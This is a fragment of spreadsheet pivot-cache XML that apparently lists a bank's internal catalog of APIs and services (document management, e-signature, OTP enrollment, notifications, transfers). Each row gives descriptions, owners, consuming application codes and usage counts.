    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="CIB_ISCIB0001"/>
    <s v="AW1011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Distribucion Tarjeta Debito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permitirá la distribución a los clientes e inventarios de tarjetas débito (plásticos). Realizar operaciones que comprendan la distribución de estas y el manejo en los inventarios de las mismas, para las sucursales o para los operadores logísticos."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1177 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-10-26T07:16:03"/>
    <s v="Document Management"/>
    <n v="100"/>
    <s v="Document Management - Digital Signature"/>
    <n v="100"/>
    <x v="182"/>
    <s v="La API Document Management - Digital Signature una vez se tenga la firma digital y el estampado cronológico de los documentos por parte del cliente se realizará la contribución o carga de dichos archivos directamente al Gestor Documental del Banco (WCC)..   NOTA: Para el caso de esta Api los endpoint a utilizar son los siguientes: Para tráfico interno: https://172.25.192.70:58012. Para trafico Cloud: https://172.25.87.4:58012."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="EASYHOME_NU0004001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ ConfirmacionOpCadena_NU0127001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ BIZAGIBEG_AW1176001"/>
    <n v="225"/>
    <n v="1468"/>
    <n v="283"/>
    <n v="268"/>
    <n v="268"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-10-26T07:16:03"/>
    <s v="Document Management"/>
    <n v="100"/>
    <s v="Document Management - Digitalization"/>
    <n v="100"/>
    <x v="183"/>
    <s v="El API DigitalizacionDeDocumentos, permite el procesamiento de un documento representado en forma digital, extrayendo la data allí­ incluida. NOTA: Para el caso de esta Api los endpoint a utilizar son los siguientes: Para tráfico interno: https://172.25.192.70:59098. Para trafico Cloud: https://172.25.87.4:59098."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="EASYHOME_NU0004001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ ConfirmacionOpCadena_NU0127001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ BIZAGIBEG_AW1176001"/>
    <m/>
    <m/>
    <m/>
    <n v="6"/>
    <n v="2"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-05-26T18:06:55"/>
    <s v="Document Service"/>
    <n v="120"/>
    <s v="Document Service - Customer Documents"/>
    <n v="101"/>
    <x v="184"/>
    <s v="Permite a los consumidores realizar consultas, para determinar la existencia o no de documentos al interior del grupo Bancolombia y así­ evitar, solicitarles a los clientes estos documentos de forma duplicada. El servicio está pensado para mostrarle a los consumidores información relevante sobre los documentos tales como: tipo del documento, subtipo del documento, dueí±o del documento, fecha de indexación del documento entre otros, adicionalmente permite elegir la opción de visualizar o no un link donde los documentos consultados pueden ser descargados, este servicio devuelve 0 o muchos documentos de acuerdo a los filtros que se realicen sobre este"/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <s v="ConsultaMetadataDocumental/V1.0"/>
    <s v="Oracle ECM_UCM - Universal Content Management_AW0494001"/>
    <s v="PODEM01_NU0001 _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001"/>
    <n v="47"/>
    <n v="13"/>
    <n v="152"/>
    <n v="95"/>
    <n v="181"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-06-10T19:58:06"/>
    <s v="Document Service"/>
    <n v="120"/>
    <s v="Document Service - Documents Catalog"/>
    <n v="100"/>
    <x v="185"/>
    <s v="Permite a los consumidores realizar la consulta de los documentos o formatos almacenados en WCC para iniciar un proceso por parte del cliente en el banco, la adquisición de un producto o bien sea recuperar los documentos del cliente para un proceso o producto especí­fico."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <s v="RecuperarCatalogo_BB2/V1.0"/>
    <m/>
    <s v="PODEM01_NU0001 _x000d__x000a_ AdquirenciaCargaMasiva_NU0142001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-06-16T15:55:16"/>
    <s v="Document Service Data"/>
    <n v="100"/>
    <s v="Document Service Data - Files Information"/>
    <n v="100"/>
    <x v="186"/>
    <s v="La API permite centralizar, para los diferentes canales que originan y manejan documentos, el tráfico y su recepción sobre el componente de recepción documental."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="PODEM01_NU0001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-06-16T15:55:16"/>
    <s v="Document Service Data"/>
    <n v="100"/>
    <s v="Document Service Data - Process Data"/>
    <n v="100"/>
    <x v="187"/>
    <s v="El servicio Consulta Datos Documentos Proceso, tiene como objetivo Consultar los datos lí­quidos de un proceso especí­fico como una nota crédito, nota débito, etc."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="PODEM01_NU0001"/>
    <n v="7929"/>
    <n v="5966"/>
    <n v="6409"/>
    <n v="8838"/>
    <n v="7497"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Ejecutar Transferencia Externa"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Desde la sucursal virtual, el cliente puede efectuar transferencias externas desde una cuenta (ahorros ó corriente) a otros bancos o a otras filiales de Bancolombia en el exterior diferentes a la filial de la cuenta origen de la transferencia"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Ejecutar Transferencia Interna"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permitir realizar transferencias en línea entre las cuentas corrientes y de Ahorros de una misma filial del grupo Bancolombia en el exterior."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-12-10T17:32:11"/>
    <s v="Electronic Promissory Note"/>
    <n v="100"/>
    <s v="Electronic Promissory Note - Management"/>
    <n v="100"/>
    <x v="188"/>
    <s v="Capacidad que permite la firma del titulo valor electrónico con las mismas caracterí­sticas de un pagaré fí­sico en cuanto a seguridad, veracidad jurí­dica, contenido y obligación de la promesa."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <s v="GestionPagareElectronico/V1.0_x000a_GestionarPagareElectronico/V1.0"/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-25T11:54:11"/>
    <s v="Document Service Sufi"/>
    <n v="100"/>
    <s v="Electronic Signature"/>
    <n v="100"/>
    <x v="189"/>
    <s v="Esta API ofrece a tus aplicaciones la posibilidad de poder realizar una firma digital a partir de un código generado por el cliente"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ VDSAUTOGESTIONCONSUMOBACK_NU0037003 _x000d__x000a_ Monitoreo_AW1378001 _x000d__x000a_ MONSUFI_AW1378001"/>
    <n v="91"/>
    <n v="616"/>
    <n v="3762"/>
    <n v="3408"/>
    <n v="5432"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-03-29T16:41:12"/>
    <s v="Electronic Signature"/>
    <n v="102"/>
    <s v="Electronic Signature - Simple Signature"/>
    <n v="102"/>
    <x v="190"/>
    <s v="Permite a los consumidores realizar el proceso de firma de un documento por un íºnico firmante retornando el documento firmado al finalizar el proceso."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ BNPL_NU0287001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Eliminar Usuario"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permitir eliminar cualquier usuario de la Sucursal Virtual para que no pueda utilizar el canal"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-05-10T22:09:08"/>
    <s v="Email Notifications"/>
    <n v="102"/>
    <s v="Email Notifications - Send Email Message"/>
    <n v="102"/>
    <x v="191"/>
    <s v="Permite el enví­o de correos electronicos personalizables mediante una plantilla HTML"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="EnvioCorreoElectronico/V1.0"/>
    <m/>
    <s v="Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ APM_AW1097001 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ HistoriaCliente_NU0090001 _x000d__x000a_ PortalAutogestionPyme_AW1287 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ LoansApproval_NU107001 _x000d__x000a_ HabitatAdministraciones_NU0113001 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ HabitatCore_AW1281003 _x000d__x000a_ HABITATCONST_NU0013001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ Inversi_NU0160001 _x000d__x000a_ BIZAGIBEG_AW1176001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ PreaprobadosSucursales_AW1299001"/>
    <n v="20110"/>
    <n v="19820"/>
    <n v="25748"/>
    <n v="34210"/>
    <n v="33832"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Enrolar Cliente OTP"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID, para poder hacer uso de este es necesario enrolarse o matricularse, para eso se expone este servicio “EnrolarClienteOTP”. Existen 3 posibles formas de usar este OTP, por Softoken, SMS o email (estos últimos dos son conocidos como ODA), de acuerdo al mecanismo que se desee utilizar es necesario matricularse de forma particular en ese mecanismo y para esto Detect ID expone 3 operaciones diferentes, para nuestro caso la información del cliente estará en el CRM, Intermedia para Valores, (número celular o email), por lo tanto no se ve la necesidad de utilizar las 3 operaciones, sino solo 2, la de uso de SMS y de email son iguales para nuestro caso, por tanto solo usaremos para ambos mecanismo la de email, la autenticación con Softoken permanecerá tal como viene aunque por el momento no se usará para Valroes. En este documento se muestra el diseño de este servicio (EnrolarClienteOTP) y su operacion (enrolarClienteOTPSoftoken)"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <s v="Cyxtera"/>
    <s v="APIC _x000d__x000a_AW1170 _x000d__x000a_NU0004001 _x000d__x000a_AW1185001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Enrolar Cliente OTP"/>
    <n v="110"/>
    <x v="0"/>
    <s v="Colombia. Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID, para poder hacer uso de este es necesario enrolarse o matricularse, para eso se expone este servicio “EnrolarClienteOTP”.   Existen 3 posibles formas de usar este OTP, por Softoken, SMS o email (estos últimos dos son conocidos como ODA), de acuerdo al mecanismo que se desee utilizar es necesario matricularse de forma particular en ese mecanismo y para esto Detect ID expone 3 operaciones diferentes, para nuestro caso la información del cliente estará en el CRM, Intermedia para Valores,  (número celular o email), por lo tanto no se ve la necesidad de utilizar las 3 operaciones, sino solo 2, la de uso de SMS y de email son iguales para nuestro caso, por tanto solo usaremos para ambos mecanismo la de email, la autenticación con Softoken permanecerá tal como viene aunque por el momento no se usará para Valroes. En este documento se muestra el diseño de este servicio (EnrolarClienteOTP) y su operacion (enrolarClienteOTPSoftoken)"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <s v="Cyxtera"/>
    <s v="AW0638"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Enrolar Cliente OTP"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Colombia. Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID, para poder hacer uso de este es necesario enrolarse o matricularse, para eso se expone este servicio “EnrolarClienteOTP”.   Existen 3 posibles formas de usar este OTP, por Softoken, SMS o email (estos últimos dos son conocidos como ODA), de acuerdo al mecanismo que se desee utilizar es necesario matricularse de forma particular en ese mecanismo y para esto Detect ID expone 3 operaciones diferentes, para nuestro caso la información del cliente estará en el CRM, Intermedia para Valores,  (número celular o email), por lo tanto no se ve la necesidad de utilizar las 3 operaciones, sino solo 2, la de uso de SMS y de email son iguales para nuestro caso, por tanto solo usaremos para ambos mecanismo la de email, la autenticación con Softoken permanecerá tal como viene aunque por el momento no se usará para Valroes. En este documento se muestra el diseño de este servicio (EnrolarClienteOTP) y su operacion (enrolarClienteOTPSoftoken)"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <s v="Cyxtera"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-09-06T18:14:11"/>
    <s v="Enrollment"/>
    <n v="100"/>
    <s v="Enrollment - Users Management"/>
    <n v="100"/>
    <x v="192"/>
    <s v="API para el manejo de enrolamiento."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="Carventuri _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-02-26T14:43:12"/>
    <s v="Enrollment"/>
    <n v="100"/>
    <s v="Enrollment - Users Management"/>
    <n v="100"/>
    <x v="193"/>
    <s v="API para el manejo de enrolamiento."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="CarventuriApiVehiculos_AW1097001 _x000d__x000a_ PuntoAliadoApiVehiculos_AW1097001"/>
    <n v="45"/>
    <n v="30"/>
    <n v="52"/>
    <n v="33"/>
    <n v="28"/>
    <s v="API ONPMS EXT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-05-04T15:55:18"/>
    <s v="Enterprises Loans"/>
    <n v="103"/>
    <s v="Enterprises Loans - Utilities"/>
    <n v="103"/>
    <x v="194"/>
    <s v="Por medio de esta API el banco enví­a en lí­nea y masivamente a Bancoldex  un paquete de solicitudes de redescuento que pasan por todas las validaciones necesarias, como la disponibilidad de recursos de la lí­nea de crédito de la entidad de redescuento, las condiciones financieras de cada solicitud y de control previo sobre el beneficiario de crédito. "/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <m/>
    <m/>
    <s v="BIZAGIACJCN_AW1285001 _x000d__x000a_ APP_AW1294001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="3003"/>
    <n v="2792"/>
    <n v="2449"/>
    <n v="2130"/>
    <n v="2621"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Enviar Codigo Seguridad OTP"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Realizar el envió del código de Seguridad al cliente, a través del componente de alertas._x005f_x000D_ "/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Enviar Notificacion"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Servicio para envio de Alertas y Notificacion por correo electronico o mensaje de texto al dispositivo celular, sobre cualquier proceso que se realice en el banco por parte del cliente y sea controlado por un consumidor en específico."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="PCC - Programas Comunes Canales_Alertas_ISPCC0002"/>
    <s v="AW1208001 _x000d__x000a_AW0937 _x000d__x000a_AW0922 _x000d__x000a_AW0856 _x000d__x000a_AW1097001 _x000d__x000a_AW0638 _x000d__x000a_AW1142001 _x000d__x000a_TP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Enviar Recordatorio Usuario"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permite recordar al cliente E-banking el usuario para el ingresar a la plataforma Sucursal Empresas y Personas y deberá ser enviarlo a través del Componente de Alertas al cliente. (Delivery System)."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Envio Alertas Y Notificaciones"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permite obtener la información para crear la estructura de un mensaje de alertas y notificaciones que deba enviarse a un cliente al momento de realizar una transacción. Estas transacciones se encuentran definidas en la sucursal virtual personas y existen también otro tipo de alertas que son obligatorias así el cliente no las haya configurado.  Este servicio invoca la aplicación de alertas y notificaciones almacenada en el módulo PCC en el iseries."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Canales Digitales Personas"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1170 _x000d__x000a_NU0014001 _x000d__x000a_NU0100001 _x000d__x000a_NU0019001 _x000d__x000a_AW1300001 _x000d__x000a_AW0955 _x000d__x000a_NU0103001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0147001 _x000d__x000a_NU0094001 _x000d__x000a_AW0955001 _x000d__x000a_AW1435001 _x000d__x000a_AW1315001 _x000d__x000a_AW1404002 _x000d__x000a_NU0154001 _x000d__x000a_AW1277001 _x000d__x000a_NU0034001 _x000d__x000a_NU0106001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Envio Correo Electronico"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio de EnvioCorreoElectronico consta de las siguientes funcionalidades:  - Envío correo electrónico con un contenido básico. - Envío correo electrónico con adjunto pdf generado por el banco y puesto en una ruta SFTP para que el proveedor de correo (Masivian) lo adjunte al mensaje. - Envío correo electrónico con adjunto pdf generado por el banco y puesto en una ruta SFTP para que el proveedor de correo (Masivian) lo proteja con contraseña y lo adjunte al mensaje. - Envío correo electrónico con adjunto pdf generado por el proveedor de correo (Masivian) utilizando una plantilla previamente cargada en su sistema. - Envío correo electrónico con adjunto pdf generado y protegido con clave por el proveedor de correo (Masivian) utilizando una plantilla previamente cargada en su sistema. - Envío correo electrónico con adjunto enviado en base64 en el mensaje xml, para que el proveedor de correo (Masivian) lo decodifique y lo adjunte como pdf en el mensaje. - Envío correo electrónico con adjunto enviado en base64 en el mensaje xml, para que el proveedor de correo (Masivian) lo decodifique, lo proteja con clave y lo adjunte como pdf en el mensaje."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Masivia"/>
    <s v="APIC _x000d__x000a_AW1177 _x000d__x000a_AW0937 _x000d__x000a_AW1070 _x000d__x000a_AW1285001 _x000d__x000a_AW1373 _x000d__x000a_AW0407 _x000d__x000a_AW1313 _x000d__x000a_AW1097001 _x000d__x000a_AW1272001 _x000d__x000a_AW0398 _x000d__x000a_AW1206001 _x000d__x000a_AW0360007 _x000d__x000a_AW1170 _x000d__x000a_AW1287001 _x000d__x000a_AW1277001 _x000d__x000a_AW1302001 _x000d__x000a_NU0100001 _x000d__x000a_NU107001 _x000d__x000a_NU0004001 _x000d__x000a_AW1315001 _x000d__x000a_AW1128 _x000d__x000a_NU0090001 _x000d__x000a_AW1281003 _x000d__x000a_BIZ _x000d__x000a_AW0360009 _x000d__x000a_AW1172001 _x000d__x000a_AW1287 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0035001 _x000d__x000a_AW1151001 _x000d__x000a_AW1218001 _x000d__x000a_NU0034001 _x000d__x000a_AW1185001 _x000d__x000a_NU0010001 _x000d__x000a_NU0143001 _x000d__x000a_AW1176 _x000d__x000a_NU0013001 _x000d__x000a_NU0170001 _x000d__x000a_NU0113001 _x000d__x000a_AW0660 _x000d__x000a_NU0102001 _x000d__x000a_NU0046001 _x000d__x000a_AW1299001 _x000d__x000a_AW1281002 _x000d__x000a_NU0137001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Envio Correo Electronico Todo1"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El presente servicio permite realizar el envío de correo electrónico básico (sin adjuntos) a través del proveedor Todo1. Dichos correos corresponden a los generados por Alertas y Notificaciones que se encuentra en Iseries. Dichas alertas son generadas dada la ocurrencia de una transacción o evento en un proceso de un producto, que amerite comunicarse a los clientes._x000a__x000a_Su principal función será recibir la trama plana que entrega Iseries para transformarla y entregar al proveedor la estructura solicitada por el mismo."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AW0407 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Envio Data Liquida Persona"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio tiene como objetivo recibir la data líquida que Kofax obtuvo de la lectura de una imagen de un documento (cédula, pasaporte, cédula de extranjería)."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="_x000a__x000a_KOFAX – Herramienta de captura_AW1108001"/>
    <s v="AW0937 _x000d__x000a_AW1108001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Envio Mensajeria Movil"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite realizar el envío de mensajería móvil. Está enfocado a consumidores que tienen la necesidad de realizar envío de mensajes a partir de la ocurrencia de una transacción o evento en un proceso de un producto, donde deba establecerse comunicación con los clientes."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AW0407 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Envio Metadata Documental"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio tiene como alcance el envio de metadata para el proceso de estudio de crédito de consumo originada en bizagi."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
